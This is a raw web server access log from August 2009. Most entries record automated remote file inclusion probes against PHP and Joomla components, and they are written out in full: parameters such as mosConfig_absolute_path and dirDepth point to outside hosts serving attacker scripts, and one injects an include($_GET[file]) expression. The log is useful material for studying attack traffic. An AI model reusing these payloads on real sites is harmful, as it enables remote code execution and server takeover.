217.199.222.19 - - [02/Aug/2009:02:50:22 -0400] "GET /logs/access_log.Q109061200%20%20/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:02:50:39 -0400] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:02:50:39 -0400] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:02:50:41 -0400] "GET /logs/access_log.Q109052500/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:02:50:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.199.222.19 - - [02/Aug/2009:02:50:58 -0400] "GET /logs/access_log.Q109061200%20%20/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:51:01 -0400] "GET /logs/access_log.Q109061200%20%20/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:51:04 -0400] "GET /logs/access_log.Q109071700%20%20/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:51:21 -0400] "GET /logs/access_log.Q109071700%20%20/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:51:39 -0400] "GET /logs/access_log.Q109071700%20%20/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.38.243.71 - - [02/Aug/2009:02:52:38 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.voyageclub.ru///files/jember/1.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
218.38.243.71 - - [02/Aug/2009:02:52:38 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.voyageclub.ru///files/jember/1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.38.243.71 - - [02/Aug/2009:02:52:38 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://www.voyageclub.ru///files/jember/1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.38.243.71 - - [02/Aug/2009:02:52:41 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.voyageclub.ru///files/jember/1.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
218.38.243.71 - - [02/Aug/2009:02:52:41 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://www.voyageclub.ru///files/jember/1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.38.243.71 - - [02/Aug/2009:02:52:41 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.voyageclub.ru///files/jember/1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.43.202.66 - - [02/Aug/2009:02:53:01 -0400] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
211.43.202.66 - - [02/Aug/2009:02:53:01 -0400] "GET /logs/access_log.Q109061400//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
211.43.202.66 - - [02/Aug/2009:02:53:01 -0400] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
211.43.202.66 - - [02/Aug/2009:02:53:04 -0400] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
211.43.202.66 - - [02/Aug/2009:02:53:04 -0400] "GET /logs/access_log.Q109061400//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
211.43.202.66 - - [02/Aug/2009:02:53:04 -0400] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
218.38.243.71 - - [02/Aug/2009:02:53:48 -0400] "GET /logs/access_log.Q109071700/includes/ktedit/toolbar.php?dirDepth=http://www.voyageclub.ru///files/jember/1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.150.78.235 - - [02/Aug/2009:02:53:49 -0400] "GET /logs/access_log.Q109062400%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
218.38.243.71 - - [02/Aug/2009:02:53:49 -0400] "GET /logs/access_log.Q109071700/includes/ktedit/toolbar.php?dirDepth=http://www.voyageclub.ru///files/jember/1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.150.78.235 - - [02/Aug/2009:02:54:29 -0400] "GET /logs/access_log.Q109060800%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
61.222.190.185 - - [02/Aug/2009:02:54:31 -0400] "GET /logs/access_log.Q109062200%20/default.php?page=http://carsplusmovies.com/wp-content/plugins/maintenance-mode/maintenance-mode.do??? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
209.59.12.99 - - [02/Aug/2009:02:55:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.43.202.66 - - [02/Aug/2009:02:56:12 -0400] "GET /logs/access_log.Q109070600//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
124.0.237.140 - - [02/Aug/2009:02:56:37 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:56:37 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:02:56:37 -0400] "GET /logs/access_log.Q109060200%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
211.43.202.66 - - [02/Aug/2009:02:56:59 -0400] "GET /logs/access_log.Q109070600//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://ipsalamyo.trakya.edu.tr/_silinecek_6/plugins/idi.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
124.0.237.140 - - [02/Aug/2009:02:57:36 -0400] "GET /logs/access_log.Q109071000%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:02:59:25 -0400] "GET /logs/access_log.Q109052200/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
208.80.195.54 - - [02/Aug/2009:02:59:33 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.0.3705; Media Center PC 3.1; .NET CLR 1.1.4322; ZangoToolbar 4.8.2)"
124.0.237.140 - - [02/Aug/2009:02:59:59 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:03:00:00 -0400] "GET /logs/access_log.Q109070800//modules/errors.php?error=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
218.150.78.235 - - [02/Aug/2009:03:00:28 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.150.78.235 - - [02/Aug/2009:03:00:28 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.150.78.235 - - [02/Aug/2009:03:00:28 -0400] "GET /logs/access_log.Q109062400%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:03:00:46 -0400] "GET /logs/access_log.Q109052200/includes/ktedit/toolbar.php?dirDepth=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:03:00:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.38.243.71 - - [02/Aug/2009:03:01:20 -0400] "GET /logs/access_log.Q109061200%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.voyageclub.ru///files/jember/1.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.38.243.71 - - [02/Aug/2009:03:01:23 -0400] "GET /logs/access_log.Q109061200%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.voyageclub.ru///files/jember/1.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:03:01:24 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.150.78.235 - - [02/Aug/2009:03:01:57 -0400] "GET /logs/access_log.Q109070700%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
208.111.94.201 - - [02/Aug/2009:03:02:06 -0400] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
208.111.94.201 - - [02/Aug/2009:03:02:06 -0400] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
208.111.94.201 - - [02/Aug/2009:03:02:06 -0400] "GET /logs/access_log.Q109061700%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt??? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
208.111.94.201 - - [02/Aug/2009:03:02:11 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt??? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
123.242.165.138 - - [02/Aug/2009:03:03:07 -0400] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://lec.chonbuk.ac.kr/bak/fx29id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:03:03:08 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
124.0.237.140 - - [02/Aug/2009:03:03:08 -0400] "GET /logs/access_log.Q109070800//modules/errors.php?error=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
123.242.165.138 - - [02/Aug/2009:03:03:42 -0400] "GET /logs/access_log.Q109070200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://lec.chonbuk.ac.kr/bak/fx29id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:03:05:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.0.237.140 - - [02/Aug/2009:03:06:00 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.150.78.235 - - [02/Aug/2009:03:07:33 -0400] "GET /logs/access_log.Q109062400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.150.78.235 - - [02/Aug/2009:03:07:33 -0400] "GET /logs/access_log.Q109070700//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:03:07:44 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:03:07:50 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:03:07:54 -0400] "GET /logs/access_log.Q109052200/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:03:07:54 -0400] "GET /logs/access_log.Q109071700/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:03:08:54 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:03:08:54 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.45.176.74 - - [02/Aug/2009:03:09:11 -0400] "GET //common/db.php?commonpath=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.45.176.74 - - [02/Aug/2009:03:09:11 -0400] "GET /logs//common/db.php?commonpath=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
211.45.176.74 - - [02/Aug/2009:03:09:11 -0400] "GET /logs/access_log.Q109071100//common/db.php?commonpath=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
202.162.33.201 - - [02/Aug/2009:03:11:00 -0400] "GET /logs/phphtml.php?htmlclass_path=http://prideofderby.co.uk/language/CMD.txt??? HTTP/1.0" 404 214 "-" "libwww-perl/5.65"
202.162.33.201 - - [02/Aug/2009:03:11:00 -0400] "GET /phphtml.php?htmlclass_path=http://prideofderby.co.uk/language/CMD.txt??? HTTP/1.0" 404 209 "-" "libwww-perl/5.65"
202.162.33.201 - - [02/Aug/2009:03:11:00 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://prideofderby.co.uk/language/CMD.txt??? HTTP/1.0" 404 236 "-" "libwww-perl/5.65"
209.59.12.99 - - [02/Aug/2009:03:11:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.119.154.129 - - [02/Aug/2009:03:11:26 -0400] "GET /logs/access_log.Q109070900/lostpasswd.php?env[include_prefix]=http://www.lines.it///id.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
85.119.154.129 - - [02/Aug/2009:03:11:26 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.lines.it///id.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
85.119.154.129 - - [02/Aug/2009:03:11:27 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.lines.it///id.txt? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
202.162.33.201 - - [02/Aug/2009:03:11:49 -0400] "GET /logs/error_log.Q109052300/phphtml.php?htmlclass_path=http://prideofderby.co.uk/language/CMD.txt??? HTTP/1.0" 404 235 "-" "libwww-perl/5.65"
79.233.81.134 - - [02/Aug/2009:03:12:06 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 1.1.4322)"
79.233.81.134 - - [02/Aug/2009:03:12:06 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 1.1.4322)"
79.233.81.134 - - [02/Aug/2009:03:12:10 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 1.1.4322)"
79.233.81.134 - - [02/Aug/2009:03:12:10 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 1.1.4322)"
72.30.81.182 - - [02/Aug/2009:03:12:26 -0400] "GET /logs/access_log.Q107111800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
85.119.154.129 - - [02/Aug/2009:03:12:43 -0400] "GET /logs/access_log.Q109070600/lostpasswd.php?env[include_prefix]=http://www.lines.it///id.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
218.38.243.71 - - [02/Aug/2009:03:12:45 -0400] "GET /logs/access_log.Q109060600%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.voyageclub.ru///files/jember/1.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
85.119.154.129 - - [02/Aug/2009:03:15:13 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.lines.it///id.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
209.59.12.99 - - [02/Aug/2009:03:15:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.181.7.123 - - [02/Aug/2009:03:16:45 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
208.111.94.201 - - [02/Aug/2009:03:17:30 -0400] "GET //components/com_fabrik/libs/blowfish.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
208.111.94.201 - - [02/Aug/2009:03:17:30 -0400] "GET /logs//components/com_fabrik/libs/blowfish.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
208.111.94.201 - - [02/Aug/2009:03:17:30 -0400] "GET /logs/access_log.Q109070700//components/com_fabrik/libs/blowfish.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
208.111.94.201 - - [02/Aug/2009:03:17:34 -0400] "GET /logs/access_log.Q109071900//components/com_fabrik/libs/blowfish.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
123.125.66.123 - - [02/Aug/2009:03:17:50 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
218.38.243.71 - - [02/Aug/2009:03:18:02 -0400] "GET /logs/access_log.Q109060600%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.voyageclub.ru///files/jember/1.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
114.32.40.221 - - [02/Aug/2009:03:18:06 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
114.32.40.221 - - [02/Aug/2009:03:18:06 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
114.32.40.221 - - [02/Aug/2009:03:18:06 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
114.32.40.221 - - [02/Aug/2009:03:18:06 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
208.111.94.201 - - [02/Aug/2009:03:18:19 -0400] "GET /logs/access_log.Q109070700//components/com_fabrik/libs/blowfish.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
208.111.94.201 - - [02/Aug/2009:03:18:19 -0400] "GET //components/com_fabrik/libs/blowfish.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
208.111.94.201 - - [02/Aug/2009:03:18:19 -0400] "GET /logs//components/com_fabrik/libs/blowfish.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
208.111.94.201 - - [02/Aug/2009:03:18:25 -0400] "GET /logs/access_log.Q109071900//components/com_fabrik/libs/blowfish.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
206.176.241.116 - - [02/Aug/2009:03:18:31 -0400] "GET /logs/access_log.Q109070800//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
206.176.241.116 - - [02/Aug/2009:03:18:31 -0400] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
206.176.241.116 - - [02/Aug/2009:03:18:32 -0400] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
85.119.154.129 - - [02/Aug/2009:03:18:32 -0400] "GET /logs/error_log.Q109062300/lostpasswd.php?env[include_prefix]=http://www.lines.it///id.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
85.119.154.129 - - [02/Aug/2009:03:18:32 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.lines.it///id.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
85.119.154.129 - - [02/Aug/2009:03:18:33 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.lines.it///id.txt? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
85.119.154.129 - - [02/Aug/2009:03:18:33 -0400] "GET /logs/access_log.Q109061200/lostpasswd.php?env[include_prefix]=http://www.lines.it///id.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
211.45.176.74 - - [02/Aug/2009:03:18:38 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.45.176.74 - - [02/Aug/2009:03:18:38 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.45.176.74 - - [02/Aug/2009:03:18:38 -0400] "GET /logs/access_log.Q109052200//include/admin.lib.inc.php?site_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.45.176.74 - - [02/Aug/2009:03:18:43 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
91.192.37.223 - - [02/Aug/2009:03:18:45 -0400] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.828"
91.192.37.223 - - [02/Aug/2009:03:18:45 -0400] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.828"
91.192.37.223 - - [02/Aug/2009:03:18:46 -0400] "GET /logs/access_log.Q109053100//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.828"
69.175.2.122 - - [02/Aug/2009:03:18:54 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:03:19:00 -0400] "GET /logs/access_log.Q109052200/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.175.2.122 - - [02/Aug/2009:03:19:00 -0400] "GET /logs/access_log.Q109071700/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
91.192.37.223 - - [02/Aug/2009:03:19:08 -0400] "GET /logs/access_log.Q109070800//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.828"
216.117.172.131 - - [02/Aug/2009:03:19:27 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:03:19:27 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
